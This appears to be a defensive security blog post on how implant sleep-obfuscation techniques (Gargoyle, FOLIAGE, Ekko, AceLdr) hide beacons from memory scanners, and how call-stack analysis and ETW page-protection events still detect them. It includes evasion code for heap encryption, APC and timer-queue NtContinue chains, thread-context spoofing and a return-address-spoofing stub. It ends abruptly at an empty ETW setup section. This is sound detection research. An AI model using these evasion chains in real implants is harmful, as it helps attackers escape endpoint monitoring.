Hunting Sleeping Giants: Detecting Encrypted Beacon Sleep Obfuscation

Memory scanning for sleeping implants worked until the 2017 release of Gargoyle, and it has worked less well every year since. The assumption built into YARA-based scanning, BeaconEye, Moneta, and most commercial EDR memory inspection is that a beacon between callbacks is readable: the shellcode is present, the config is there, the strings are findable. Against any implant implementing sleep obfuscation, that assumption breaks completely. Between callbacks the code is either encrypted in place, hidden behind non-executable permissions, or both. Pattern matching hits nothing. Attribute scanning finds nothing executable to flag. The beacon is alive and functional, and your scanner returned clean.

This post covers the full lineage from Gargoyle through FOLIAGE and Ekko: how each technique works mechanically at the API and memory level, where each one was wrong about what defenders could see, and the specific detection primitives that catch them despite the evasion. The primary source for technique accuracy is Kyle Avery’s DEF CON 30 presentation and accompanying BHIS post. Where source code and documentation conflict, the Avery primary source takes precedence.

What memory scanners actually look at

Understanding what you can detect requires understanding what the tools look at. Memory scanners operate across three distinct detection primitives, and sleep obfuscation techniques are designed to defeat all three.

Pattern matching is the most widely understood capability. YARA scans all memory allocated by a target process and matches string, byte, and logical patterns against that content. BeaconEye builds on YARA specifically by restricting its scan to heap memory, searching for the Cobalt Strike configuration structures dynamically allocated at beacon initialization. Commercial products including Carbon Black and CrowdStrike explicitly use YARA for in-memory detection. Any technique that makes pattern content unreadable or unrecognizable defeats this layer entirely.

Memory attribute scanning looks at the properties of allocated regions rather than their content. Moneta scans for memory that is simultaneously executable and privately committed: executable because all code must be executable, private commit because legitimate code on Windows is loaded from disk as image commit rather than dynamically allocated. JIT environments such as .NET and web browsers create legitimate executable private commit memory, but outside those contexts it is a strong indicator. Moneta also checks the start address of all threads for private commit: if the thread start address is in private memory, the thread was created to execute injected code. This specific check is simple to evade by creating a suspended thread with an image commit start address and then redirecting it, which is why the more useful signal is page permissions rather than thread start addresses. PE-sieve similarly scans for executable private memory but focuses on return addresses: it checks the return address of all threads to see if they point to private commit memory.
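The attribute check described above reduces to a small predicate over the fields a scanner reads for each region. The following is a minimal sketch, not Moneta's actual code: the `region_info` struct and function names are hypothetical, and the constants are redefined locally (mirroring the Windows SDK values) so the logic compiles without the Windows headers.

```c
#include <stdbool.h>
#include <stdint.h>

/* Values mirror the Windows SDK constants; redefined here for portability. */
#define PAGE_EXECUTE           0x10u
#define PAGE_EXECUTE_READ      0x20u
#define PAGE_EXECUTE_READWRITE 0x40u
#define PAGE_EXECUTE_WRITECOPY 0x80u
#define MEM_COMMIT             0x1000u
#define MEM_PRIVATE            0x20000u
#define MEM_IMAGE              0x1000000u

/* Hypothetical subset of what VirtualQueryEx reports for one region. */
typedef struct {
    uint32_t state;    /* MEM_COMMIT, MEM_RESERVE, ... */
    uint32_t protect;  /* PAGE_* protection value */
    uint32_t type;     /* MEM_PRIVATE, MEM_IMAGE, MEM_MAPPED */
} region_info;

/* True when the protection value grants execute access in any form. */
static bool is_executable(uint32_t protect)
{
    return (protect & (PAGE_EXECUTE | PAGE_EXECUTE_READ |
                       PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)) != 0;
}

/* True for committed, private, executable memory: the combination that
 * attribute scanners treat as an indicator outside JIT processes. */
static bool is_exec_private(const region_info *r)
{
    return r->state == MEM_COMMIT &&
           r->type == MEM_PRIVATE &&
           is_executable(r->protect);
}
```

A region that is private but currently PAGE_READWRITE fails this predicate, which is exactly the gap that sleep obfuscation exploits.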

Stack tracing is the most recent addition. BeaconHunter and Hunt-Sleeping-Beacons operate on the observation that beacons using Sleep or NtDelayExecution to wait between callbacks set the thread wait reason to DelayExecution. Enumerating all threads and flagging those in a DelayExecution wait state with private commit memory anywhere in their call stack catches naive implementations reliably. MalMemDetect takes a different approach to stack tracing by hooking specific API calls at runtime, RtlAllocateHeap, NtWaitForSingleObject, and InternetConnectA among others, and checking the return address on the stack at the moment of each call. When a beacon calls one of those APIs, the return address points back into its shellcode, which is in private commit memory. The hook catches it at execution time regardless of what happens to the memory during sleep.
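The first-generation stack-tracing heuristic can be sketched as a predicate over a thread snapshot. This is an illustrative sketch only: `frame_info` and `thread_snapshot` are hypothetical types standing in for whatever a real stack walker produces, and the wait reason values are the KWAIT_REASON enumeration values (DelayExecution = 4, UserRequest = 6).

```c
#include <stdbool.h>
#include <stddef.h>

/* KWAIT_REASON values from the Windows kernel headers. */
enum { WAIT_DELAY_EXECUTION = 4, WAIT_USER_REQUEST = 6 };

/* Hypothetical per-frame summary produced by a stack walker. */
typedef struct {
    bool image_backed;  /* return address resolves to a loaded module */
} frame_info;

/* Hypothetical snapshot of one thread. */
typedef struct {
    int               wait_reason;
    const frame_info *frames;
    size_t            frame_count;
} thread_snapshot;

/* True when any frame returns into memory that is not image-backed. */
static bool has_private_frame(const thread_snapshot *t)
{
    for (size_t i = 0; i < t->frame_count; i++) {
        if (!t->frames[i].image_backed)
            return true;
    }
    return false;
}

/* First-generation heuristic: DelayExecution wait plus a private frame. */
static bool flag_delay_execution_thread(const thread_snapshot *t)
{
    return t->wait_reason == WAIT_DELAY_EXECUTION && has_private_frame(t);
}
```

Because the predicate keys on the wait reason, the same stack parked under UserRequest is not flagged, which is the weakness that later evasions target.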

Gargoyle: the technique that started it

Josh Lospinoso’s 2017 Gargoyle proof of concept established the foundational approach that everything since has built on. The core insight is that code does not need to be executable while it is not executing. During the sleep window between beacon callbacks, the shellcode region can be marked PAGE_READWRITE or PAGE_NOACCESS, making it invisible to scanners that restrict their search to executable memory. A timer or APC callback wakes the code, a ROP gadget restores execute permissions, the code runs its callback, and the cycle repeats.

Gargoyle was 32-bit only. The ROP gadgets used were chosen from image commit DLLs to avoid placing executable code in private commit memory, which was the key insight for defeating attribute-based scanning. The technique required specific gadget offsets that varied across Windows versions, creating portability problems. Waldo-irc later released YouMayPasser, a ready-to-use 64-bit Gargoyle implementation for Cobalt Strike that uses VEH (Vectored Exception Handling) and hardware breakpoints to hook API calls. thefLinkk released DeepSleep, an APC-less implementation using ROP only. These extended the approach to 64-bit Windows and to production implant frameworks, but the underlying primitive remained the same: hide in non-executable memory between callbacks.

// Gargoyle primitive: the protection cycle that everything since has used
// During execution: PAGE_EXECUTE_READ (0x20)
// During sleep: PAGE_READWRITE (0x04) or PAGE_NOACCESS (0x01)
// 
// The timer or APC fires and triggers a ROP chain that calls VirtualProtect
// to restore execute permissions before the beacon code runs
//
// Detection implication: any technique in this family must change page
// protections at least twice per sleep cycle (once to hide, once to restore)
// This is the invariant that ETW detection exploits

SystemFunction032: why the encryption must stay in image commit memory

Encrypting shellcode solves the pattern matching problem. A beacon that XORs its code section during sleep cannot be matched by YARA rules searching for known byte sequences. But the code performing the encryption cannot itself be in private executable memory or Moneta flags it. Everything in the obfuscation chain must execute from image commit memory, which means system DLLs.

SystemFunction032 is an RC4 implementation exported from advapi32.dll. Benjamin Delpy's use of it in Mimikatz brought it to wider attention. It accepts two ustring arguments, one for the target data and one for the key, and performs RC4 encryption or decryption in place. Since RC4 is symmetric, both operations use the same function. The export lives in a system DLL, which is image commit memory in every process that loads it, so calling it from a ROP chain or NtContinue context never requires executing code from private commit memory.

// SystemFunction032: RC4 from advapi32.dll, both encrypt and decrypt
// Used for DATA and HEAP encryption where code must stay in image commit

// Counted-buffer structure taken by SystemFunction032 for both data and key
// (declared before the typedef that refers to it)
struct ustring {
    DWORD  Length;
    DWORD  MaximumLength;
    PUCHAR Buffer;
};

// Technically SystemFunction032 is encryption, SystemFunction033 is decryption
// RC4 is bidirectional so either works for both operations

typedef NTSTATUS (WINAPI* pSF032)(struct ustring*, struct ustring*);
pSF032 Sf032 = (pSF032)GetProcAddress(GetModuleHandleA("advapi32.dll"), "SystemFunction032");

// For heap data encryption (BeaconEye bypass context)
struct ustring heap_data;
heap_data.Buffer        = (PUCHAR)heap_allocation_base;
heap_data.Length        = heap_allocation_size;
heap_data.MaximumLength = heap_allocation_size;

struct ustring key;
key.Buffer        = (PUCHAR)rc4_key_bytes;
key.Length        = key_size;
key.MaximumLength = key_size;

Sf032(&heap_data, &key);   // Encrypt heap in place from advapi32.dll
// Sf032 again with same key to decrypt (RC4 symmetric)

Detection implication: SystemFunction032 is called legitimately in many processes. What is unusual is its call origin. When it is called from a thread whose return address is in private commit memory, or when it is called in rapid succession on large blocks of code section memory rather than small heap allocations, the context is suspicious. MalMemDetect catches the private commit return address at call time. Process Monitor captures the API call sequence for offline correlation.

Heap encryption and the BeaconEye problem

Encrypting code solves pattern matching against code sections. BeaconEye specifically scans heap allocations for Cobalt Strike configuration structures, which are dynamically allocated at beacon startup and persist on the heap throughout the implant’s lifetime. Making the code non-executable during sleep does not affect heap content visibility at all.

Kyle Avery’s AceLdr addresses this with a secondary heap approach derived from his earlier TitanLdr fork. Rather than tracking individual heap entries for encryption, the implementation creates a new heap before the Cobalt Strike beacon initializes. GetProcessHeap in the implant’s IAT is hooked to redirect beacon heap allocations to this secondary heap. Since only beacon code uses the secondary heap, encrypting all entries on it with SystemFunction032 at sleep time covers the entire beacon configuration without needing to track which allocations belong to the beacon. When a scanner runs during sleep, the heap entries are encrypted ciphertext with no recognizable structure, which defeats BeaconEye’s config structure pattern matching entirely.

// Secondary heap approach for BeaconEye bypass (AceLdr implementation concept)
// The secondary heap is created before beacon initializes

HANDLE hSecondaryHeap = HeapCreate(0, 0, 0);

// GetProcessHeap in beacon's IAT is patched to return hSecondaryHeap
// All beacon allocations now go to the secondary heap
// At sleep time, walk the secondary heap and encrypt all entries

PROCESS_HEAP_ENTRY entry;
entry.lpData = NULL;
while (HeapWalk(hSecondaryHeap, &entry)) {
    if (entry.wFlags & PROCESS_HEAP_ENTRY_BUSY) {
        // Encrypt this allocation with SystemFunction032
        EncryptWithSF032(entry.lpData, entry.cbData, rc4_key);
    }
}

// After sleep: walk again and decrypt all entries before beacon continues
// BeaconEye scanning during sleep finds only encrypted blobs, not CS config structures

FOLIAGE: NtContinue chains and KsecDD encryption

Austin Hudson’s FOLIAGE moved the execution chain away from ROP gadgets with version-specific offsets by using NtContinue directly. NtContinue is the NTAPI routine used in exception handling to restore a thread’s execution context. It accepts a CONTEXT structure and restores all register values including RIP, then continues execution from whatever RIP specifies. Any code that can be expressed as a function address and register setup can be called via NtContinue without needing a ROP gadget chain specific to the target Windows version.

FOLIAGE queues a series of user-mode APCs via NtQueueApcThread, each passing NtContinue as the APC routine and a CONTEXT structure pointer as the argument. When the target thread enters an alertable wait state, each APC fires in sequence, with NtTestAlert placed at the top of each context stack to force the thread back into alertable state so the next APC in the chain can fire immediately. The setup phase and execution chain are distinct: setup happens before the APCs are queued, execution happens when each APC fires.

The FOLIAGE setup phase, per Kyle Avery’s analysis of Austin Hudson’s implementation:
1. Opens a handle to the KsecDD driver for kernel-level encryption
2. Opens a handle to the current thread to modify its context
3. Creates a new thread to serve as the APC queue target
4. Creates an event object to keep the new thread from exiting prematurely
5. Copies the context of the new thread into a new context structure as the basis for the chain

The FOLIAGE sleep chain, executed as each queued APC fires:
1. Waits on the event object to keep the new thread alive
2. Changes the beacon’s memory to non-executable
3. Instructs the KsecDD driver to encrypt the beacon memory
4. Saves the context of the original beacon thread
5. Sets the original thread’s context to a manufactured fake context (at-rest stack spoofing)
6. Sleeps for the specified duration using NtDelayExecution
7. Instructs the KsecDD driver to decrypt the beacon memory
8. Restores the original beacon thread’s context
9. Changes the beacon’s memory back to executable
10. Exits the new APC thread

// FOLIAGE: KsecDD driver usage for kernel-level encryption
// KsecDD is the Kernel Security Support Provider Interface driver at \Device\KsecDD
// FOLIAGE opens a handle to it and uses IOCTL calls to encrypt/decrypt memory
// This allows encryption to happen in kernel mode without needing user-mode
// write permissions on the target memory region

// Opening the KsecDD handle (setup phase, not the sleep chain)
HANDLE hKsecDD;
UNICODE_STRING uDriverPath;
OBJECT_ATTRIBUTES oa;
IO_STATUS_BLOCK isb;

RtlInitUnicodeString(&uDriverPath, L"\\Device\\KsecDD");
InitializeObjectAttributes(&oa, &uDriverPath, OBJ_CASE_INSENSITIVE, NULL, NULL);

NtCreateFile(&hKsecDD,
    FILE_READ_DATA | FILE_WRITE_DATA | SYNCHRONIZE,
    &oa, &isb, NULL, 0,
    FILE_SHARE_READ | FILE_SHARE_WRITE,
    FILE_OPEN, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);

// The KsecDD IOCTL for encryption operates in kernel space
// This is why FOLIAGE does NOT use SystemFunction032 for code encryption
// KsecDD can access and transform the memory from kernel mode regardless of
// the user-mode page permission state at the time of the call

// FOLIAGE APC queue: NtContinue as APC routine, CONTEXT as argument
typedef NTSTATUS (NTAPI* pNtQueueApcThread)(HANDLE, PVOID, PVOID, PVOID, PVOID);
pNtQueueApcThread NtQueueApcThread = (pNtQueueApcThread)
    GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueueApcThread");

typedef NTSTATUS (NTAPI* pNtContinue)(PCONTEXT, BOOLEAN);
pNtContinue NtContinue = (pNtContinue)
    GetProcAddress(GetModuleHandle("ntdll.dll"), "NtContinue");

// Each step in the chain is queued as an APC
// APC routine = NtContinue, APC argument = pointer to CONTEXT for this step
// NtTestAlert at the top of each CONTEXT stack forces the thread alertable
// so the next APC fires immediately after the current step completes

NtQueueApcThread(hNewThread, (PVOID)NtContinue, &ctx_change_noexec, NULL, NULL);
NtQueueApcThread(hNewThread, (PVOID)NtContinue, &ctx_ksecdd_encrypt, NULL, NULL);
NtQueueApcThread(hNewThread, (PVOID)NtContinue, &ctx_save_context,   NULL, NULL);
NtQueueApcThread(hNewThread, (PVOID)NtContinue, &ctx_fake_context,   NULL, NULL);
NtQueueApcThread(hNewThread, (PVOID)NtContinue, &ctx_delay_exec,     NULL, NULL);
NtQueueApcThread(hNewThread, (PVOID)NtContinue, &ctx_ksecdd_decrypt, NULL, NULL);
NtQueueApcThread(hNewThread, (PVOID)NtContinue, &ctx_restore_ctx,    NULL, NULL);
NtQueueApcThread(hNewThread, (PVOID)NtContinue, &ctx_change_exec,    NULL, NULL);

// Signal the event to start the chain
SetEvent(hChainStartEvent);

The critical distinction from Ekko: FOLIAGE uses the KsecDD kernel driver for code section encryption, not SystemFunction032. This is a deliberate design choice: KsecDD operates in kernel mode and can encrypt the memory region regardless of its user-mode page permissions. FOLIAGE does not need to change the beacon memory to PAGE_READWRITE before encrypting it because KsecDD does not need user-mode write access. The protection chain is non-executable during sleep, without the RW intermediate step that Ekko requires.

Ekko: timer queues, SystemFunction032, and the RW window

C5pider’s Ekko, released after reversing MDSec NightHawk, replaces FOLIAGE’s APC queue mechanism with Windows timer queues via CreateTimerQueueTimer. The fundamental goal is the same: execute a chain of operations during sleep without leaving executable private commit memory readable by scanners. The implementation differs in its trigger mechanism, encryption method, and the memory state visible during sleep.

Ekko creates a timer queue, then schedules callbacks at 100ms intervals. The first timer fires at T+0 and calls RtlCaptureContext rather than NtContinue, capturing the timer thread’s register state as the basis for all subsequent context structures. Every later timer callback calls NtContinue with a CONTEXT structure defining one step in the sleep chain. From the Ekko source directly:

// Ekko.c - the actual timer queue setup (from Cracked5pider/Ekko on GitHub)
// First: RtlCaptureContext at T+0 to capture thread state
CreateTimerQueueTimer(&hNewTimer, hTimerQueue,
    RtlCaptureContext,          // NOT NtContinue for the first call
    &CtxThread,                 // Writes captured context here
    0, 0, WT_EXECUTEINTIMERTHREAD);

// Then WaitForSingleObject to give RtlCaptureContext time to fire
WaitForSingleObject(hEvent, 0x32);

// Context structures for each step are copies of CtxThread
// with Rip and Rsp modified for the target operation
CopyMemory(&RopProtRW, &CtxThread, sizeof(CONTEXT));
CopyMemory(&RopMemEnc, &CtxThread, sizeof(CONTEXT));
CopyMemory(&RopDelay,  &CtxThread, sizeof(CONTEXT));
CopyMemory(&RopMemDec, &CtxThread, sizeof(CONTEXT));
CopyMemory(&RopProtRX, &CtxThread, sizeof(CONTEXT));
CopyMemory(&RopSetEvt, &CtxThread, sizeof(CONTEXT));

// Each step's Rip is set to the target function address
// Arguments follow the x64 calling convention in Rcx, Rdx, R8, and R9;
// Rsp is moved down by 8 so the stack looks as it would after a CALL

// The actual timer chain (100ms intervals):
// T+100ms: RopProtRW  -> VirtualProtect(beacon, size, PAGE_READWRITE, &OldProt)
CreateTimerQueueTimer(&hNewTimer, hTimerQueue, NtContinue, &RopProtRW,
    100, 0, WT_EXECUTEINTIMERTHREAD);

// T+200ms: RopMemEnc  -> SystemFunction032(encrypt beacon code)
CreateTimerQueueTimer(&hNewTimer, hTimerQueue, NtContinue, &RopMemEnc,
    200, 0, WT_EXECUTEINTIMERTHREAD);

// T+300ms: RopDelay   -> WaitForSingleObject(hEvent, sleep_duration)
// This is the actual sleep - WaitForSingleObject sets UserRequest, not DelayExecution
CreateTimerQueueTimer(&hNewTimer, hTimerQueue, NtContinue, &RopDelay,
    300, 0, WT_EXECUTEINTIMERTHREAD);

// T+400ms: RopMemDec  -> SystemFunction032(decrypt beacon code)
CreateTimerQueueTimer(&hNewTimer, hTimerQueue, NtContinue, &RopMemDec,
    400, 0, WT_EXECUTEINTIMERTHREAD);

// T+500ms: RopProtRX  -> VirtualProtect(beacon, size, PAGE_EXECUTE_READ, &OldProt)
CreateTimerQueueTimer(&hNewTimer, hTimerQueue, NtContinue, &RopProtRX,
    500, 0, WT_EXECUTEINTIMERTHREAD);

// T+600ms: RopSetEvt  -> SetEvent(hEvent) to wake the main thread
CreateTimerQueueTimer(&hNewTimer, hTimerQueue, NtContinue, &RopSetEvt,
    600, 0, WT_EXECUTEINTIMERTHREAD);

// Main thread waits on hEvent for the full chain to complete
WaitForSingleObject(hEvent, INFINITE);

The Ekko protection cycle is RX → RW → [encrypted sleep] → RW → RX. Unlike FOLIAGE there is no NOACCESS step in the basic implementation. Ekko must change to PAGE_READWRITE before calling SystemFunction032 because the encryption is done by user-mode code in advapi32.dll rather than a kernel driver. During the sleep window the memory is PAGE_READWRITE and contains RC4-encrypted ciphertext. It is readable if a scanner can access it, but there are no recognizable patterns to match. It is not executable, which is why Moneta does not flag it as suspicious executable private memory during the sleep window.

The RW window is a detection opportunity that FOLIAGE does not share. Between the VirtualProtect call setting PAGE_READWRITE and the SystemFunction032 call completing the encryption, there is a brief window where the beacon code is readable and writable but not yet encrypted. The same window exists in reverse during decryption. ETW page protection events capture both transitions regardless of how brief they are.

Evading Sleep-based detection: WaitForSingleObject instead of Sleep

BeaconHunter and the initial version of Hunt-Sleeping-Beacons used a straightforward heuristic: enumerate all threads, find those with a wait reason of DelayExecution, and investigate them for signs of shellcode in their call stacks. This caught beacons using Sleep() or NtDelayExecution directly, which was most implementations.

The evasion is replacing Sleep with WaitForSingleObject. WaitForSingleObject sets the thread wait reason to UserRequest rather than DelayExecution. This one API substitution rendered the first-generation sleep-based detection tools ineffective. Kyle Avery demonstrated this as a standalone bypass before incorporating it into the FOLIAGE and AceLdr implementations. Note that in Ekko, WaitForSingleObject is used as the sleep mechanism inside the RopDelay step of the timer chain, so Ekko inherently sets UserRequest wait reason rather than DelayExecution.

// Naive sleep implementation: detectable by BeaconHunter and original HSB
Sleep(sleep_duration_ms);
// Sets thread WaitReason = DelayExecution
// Caught by any scanner looking for DelayExecution threads

// NtDelayExecution: same wait reason
NtDelayExecution(FALSE, &delay_interval);
// Also sets WaitReason = DelayExecution

// Replacement: WaitForSingleObject on a waitable object
HANDLE hWait = CreateWaitableTimer(NULL, TRUE, NULL);
WaitForSingleObject(hWait, sleep_duration_ms);
// Sets thread WaitReason = UserRequest
// Bypasses DelayExecution-based detection in BeaconHunter and HSB v1

// Detection: neither Sleep nor WaitForSingleObject is inherently suspicious
// The signal is the combination of UserRequest wait reason, private commit
// memory in the call stack, and the specific dispatcher present (APC or timer)
// which Hunt-Sleeping-Beacons v2 detects

Return address spoofing at rest

PE-sieve checks the return addresses of all threads. When a beacon thread is parked in WaitForSingleObject during sleep, if its call stack contains return addresses pointing to private commit memory, PE-sieve flags it. The at-rest problem is how to make the thread’s call stack look clean during the sleep window without executing code from private commit memory to do the cleaning.

The simplest approach, demonstrated in ThreadStackSpoofer, is overwriting the return address on the stack with zero. This truncates the visible call stack. The limitation is that depending on the stack state, this technique can leave argument values on the stack that happen to resemble memory addresses, which can itself be an indicator. It is also brittle: the zero return address will cause a crash if the thread tries to return normally before it is restored.

FOLIAGE implements a more stable approach using NtSetContextThread. Step 5 of the FOLIAGE sleep chain uses NtSetContextThread to overwrite the original beacon thread’s context with a manufactured context that sets the RIP and call stack to values that appear to come from legitimate system code. When PE-sieve or any other tool walks the stack of the original thread during the sleep window, it sees the manufactured context rather than the real one. Kyle Avery noted at the time of the presentation that NtSetContextThread use in this context was not generating alerts from open-source scanners or commercial security products, though it remains a potential detection point for tooling that specifically monitors context manipulation.

// FOLIAGE at-rest stack spoofing: NtSetContextThread
// Happens in step 5 of the sleep chain after saving the original context

typedef NTSTATUS (NTAPI* pNtSetContextThread)(HANDLE, PCONTEXT);
pNtSetContextThread NtSetContextThread = (pNtSetContextThread)
    GetProcAddress(GetModuleHandle("ntdll.dll"), "NtSetContextThread");

// Manufactured context: RIP and call stack point to legitimate Windows code
CONTEXT fakeContext;
memset(&fakeContext, 0, sizeof(CONTEXT));
fakeContext.ContextFlags = CONTEXT_FULL;

// Point RIP at a legitimate-looking location inside ntdll or kernel32
fakeContext.Rip = (DWORD64)GetProcAddress(GetModuleHandle("ntdll.dll"),
                                            "RtlUserThreadStart");

// Stack frames point to ntdll addresses, not beacon code
// PE-sieve walking this context sees only image commit return addresses

NtSetContextThread(hOriginalBeaconThread, &fakeContext);

// At wake time (step 8 of the chain): restore the saved real context
// hRealContext was saved in step 4
NtSetContextThread(hOriginalBeaconThread, &hRealContext);

Return address spoofing at execution

At-rest spoofing covers the period when the beacon thread is parked in WaitForSingleObject. At-execution spoofing covers the other problem: when the beacon is running and makes an API call, the return address pushed onto the stack by the CALL instruction points back into the beacon’s shellcode, which is in private commit memory. MalMemDetect catches exactly this: it hooks APIs like RtlAllocateHeap and checks the return address at execution time via _ReturnAddress() and GetModuleHandleExA(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS).

namazso’s x64 Return Address Spoofing PoC addresses the at-execution case. Before making a hooked API call, a ROP gadget from a loaded DLL is placed as the return address, which after the API call jumps to a stub that restores the execution context to continue from the real beacon code. The return address visible to a hook checking _ReturnAddress() is inside a legitimate system DLL. GetModuleHandleExA succeeds. MalMemDetect does not alert.

// x64 Return Address Spoofing (namazso PoC, used in AceLdr)
// Before calling a hooked API, the return address is replaced with a
// JMP [rbx] gadget inside ntdll, which bounces through a stub back to beacon

// The stub (concept, from the PoC):
// pop r11              ; Remove the real return address from stack
// add rsp, 8           ; Alignment
// mov rax, [rsp+18h]   ; Load the parameter block pointer (offset 24 decimal)
// mov r10, [rax]       ; Load gadget address (JMP [rbx] in ntdll)
// mov [rsp], r10       ; Replace return address with gadget
// mov r10, [rax+8h]    ; Load target API function pointer
// mov [rax+8h], r11    ; Store real return in parameter block
// mov [rax+10h], rbx   ; Save rbx
// lea rbx, [rip+fixup] ; rbx = fixup stub address
// mov [rax], rbx       ; Parameter block[0] = fixup
// mov rbx, rax         ; rbx = parameter block
// jmp r10              ; Jump to target API function
//
// fixup:               ; Called via JMP [rbx] gadget after API returns
// sub rsp, 16
// mov rcx, rbx
// mov rbx, [rcx+10h]   ; Restore rbx
// jmp [rcx+8h]         ; Jump to real return address in beacon code

// AceLdr applies this for three specific APIs:
// InternetConnectA, NtWaitForSingleObject, RtlAllocateHeap
// These are the APIs MalMemDetect hooks

// Detection: search for the stub pattern in process memory
// s -b 0 L?0x7fffffffffff 41 5b 48 83 c4 08 48 8b 44 24 18 (WinDbg, user-mode range)
// pop r11; add rsp,8; mov rax,[rsp+18h] - the stub entry sequence (18h = 24 decimal)
// Finding this in non-module-backed memory = spoofing stub present
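The same search can be run offline against a dumped memory region. The sketch below is a plain byte-pattern scan, under the assumption that the stub entry assembles as pop r11; add rsp, 8; mov rax, [rsp+18h], which a standard x64 assembler encodes as 41 5b 48 83 c4 08 48 8b 44 24 18. Variants compiled differently will need their own pattern, and `find_bytes` is a hypothetical helper name.

```c
#include <stddef.h>
#include <string.h>

/* Assumed stub entry: pop r11; add rsp, 8; mov rax, [rsp+18h] */
static const unsigned char STUB_ENTRY[] = {
    0x41, 0x5b,                    /* pop r11            */
    0x48, 0x83, 0xc4, 0x08,        /* add rsp, 8         */
    0x48, 0x8b, 0x44, 0x24, 0x18   /* mov rax, [rsp+18h] */
};

/* Returns the offset of the first match of needle in hay, or -1 if absent. */
static long find_bytes(const unsigned char *hay, size_t hay_len,
                       const unsigned char *needle, size_t needle_len)
{
    if (needle_len == 0 || hay_len < needle_len)
        return -1;
    for (size_t i = 0; i + needle_len <= hay_len; i++) {
        if (memcmp(hay + i, needle, needle_len) == 0)
            return (long)i;
    }
    return -1;
}
```

A hit only matters when the scanned buffer came from memory that is not backed by a module, so a real tool would pair this with the region type check rather than scanning every image.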

There is one fundamental limitation that the current FOLIAGE implementation cannot get around. Defeating Hunt-Sleeping-Beacons v2’s KiUserApcDispatcher detection requires spoofing the return addresses of API calls made within the APC sleep chain itself, at execution time. This requires the at-execution spoofing stub to be callable during the sleep chain. But FOLIAGE’s own sleep chain is what performs the code obfuscation. The spoofing stub is inside the shellcode that gets encrypted and marked non-executable, and the APC thread cannot call a stub that is currently non-executable. Kyle Avery notes this explicitly: the public FOLIAGE implementation cannot bypass the updated Hunt-Sleeping-Beacons because the call stack spoofing code is itself obfuscated by the technique it would need to call.

Detection 1: Hunt-Sleeping-Beacons and call stack analysis

Hunt-Sleeping-Beacons (thefLinkk) went through two generations of detection as evasion improved. The first generation looked for threads in DelayExecution state with private commit memory in their call stacks. The WaitForSingleObject substitution bypassed this by changing the wait reason to UserRequest.

The updated version detects FOLIAGE by enumerating all threads in UserRequest wait state and checking their call stacks for a return address to KiUserApcDispatcher. When FOLIAGE queues APCs via NtQueueApcThread and one fires, the kernel delivers it through KiUserApcDispatcher. That dispatcher address appears in the call stack of the APC thread during execution. A thread in UserRequest state with KiUserApcDispatcher on its call stack has received an APC that is now executing WaitForSingleObject, which is exactly the FOLIAGE sleep pattern.

For Ekko, Hunt-Sleeping-Beacons uses a parallel detection: it locates the timer callback dispatcher in ntdll by queuing its own timer callback and using RtlCaptureContext to walk its own stack and identify the dispatcher address. It then enumerates threads in UserRequest state and looks for a return address to that timer dispatcher. A timer pool thread executing a WaitForSingleObject call via an NtContinue CONTEXT is exactly the Ekko pattern. MSDN explicitly states timer callbacks should not be blocking, so a blocking WaitForSingleObject inside a timer callback is inherently anomalous.

// Hunt-Sleeping-Beacons v2 detection output (from project README)
// Run: Hunt-Sleeping-Beacons.exe

// FOLIAGE/AceLdr detection:
// [*] Now enumerating all threads in state Wait:UserRequest
// [*] Found 783 threads, checking for APC-triggered delays...
// [!] Possible Foliage identified in process: 16436
//     Thread 15768 Wait:UserRequest triggered by KiUserApcDispatcher
// [*] End

// Ekko detection:
// [!] Possible Ekko-style obfuscation in process: 12840
//     Thread 9104 Wait:UserRequest triggered by timer callback dispatcher

// WinDbg: manually inspect a flagged thread
.process /p /r [eprocess_address]
.thread [thread_address]
k            // Full call stack
// Look for: KiUserApcDispatcher, or a thread pool timer dispatcher frame
// such as RtlpTpTimerCallback / TppTimerpExecuteCallback (names vary by build)
// Look for: WaitForSingleObject called from one of those dispatchers

// The tell: legitimate WaitForSingleObject calls from timer callbacks
// do not appear in normal Windows processes. This is the abnormal behavior.
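The second-generation check can be sketched as a classification over an already-symbolized call stack. This is an illustration of the heuristic described above, not code from Hunt-Sleeping-Beacons: the function and enum names are hypothetical, and the timer dispatcher symbol is passed in as a parameter because the tool resolves that address at runtime rather than hardcoding it.

```c
#include <stddef.h>
#include <string.h>

enum { KWAIT_USER_REQUEST = 6 };  /* KWAIT_REASON value for UserRequest */

typedef enum { DISPATCH_NONE, DISPATCH_APC, DISPATCH_TIMER } dispatch_kind;

/* Classifies a blocked thread by the dispatcher found in its call stack.
 * symbols: resolved frame names, innermost first.
 * timer_symbol: name of the timer callback dispatcher located at runtime. */
static dispatch_kind classify_waiting_thread(int wait_reason,
                                             const char *const *symbols,
                                             size_t count,
                                             const char *timer_symbol)
{
    if (wait_reason != KWAIT_USER_REQUEST)
        return DISPATCH_NONE;
    for (size_t i = 0; i < count; i++) {
        if (strcmp(symbols[i], "KiUserApcDispatcher") == 0)
            return DISPATCH_APC;    /* FOLIAGE-style APC chain */
        if (timer_symbol != NULL && strcmp(symbols[i], timer_symbol) == 0)
            return DISPATCH_TIMER;  /* Ekko-style timer chain */
    }
    return DISPATCH_NONE;
}
```

A real implementation would compare return addresses against resolved dispatcher addresses instead of strings; names are used here only to keep the sketch readable.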

Detection 2: Page protection transitions via ETW

Every sleep obfuscation implementation in this lineage must change page protections. FOLIAGE changes to non-executable before encrypting and back to executable after decrypting. Ekko changes to PAGE_READWRITE before encrypting and back to PAGE_EXECUTE_READ after decrypting. Neither can avoid this. The encryption step requires a different permission state than the execution state, and the transition between them is the invariant that ETW captures.

Microsoft-Windows-Kernel-Memory EventID 98 fires on every NtProtectVirtualMemory call and records the process, address range, old protection, and new protection. No userland hook can intercept this event because it fires in the kernel before returning to user mode. The Ekko-specific signature is PAGE_EXECUTE_READ (0x20) to PAGE_READWRITE (0x04) followed by PAGE_READWRITE to PAGE_EXECUTE_READ on the same address within the beacon sleep interval. The FOLIAGE-specific signature is PAGE_EXECUTE_READ to PAGE_NOACCESS (0x01) and back. Both cycle multiple times per session at the beacon’s configured sleep interval, making timing correlation possible. Event IDs and field layouts can differ between Windows builds, so confirm them against the provider manifest on the target system (for example with logman query providers "Microsoft-Windows-Kernel-Memory") before building detections on them.

// ETW trace setup for VirtualMemory protection monitoring
// Requires administrator privileges

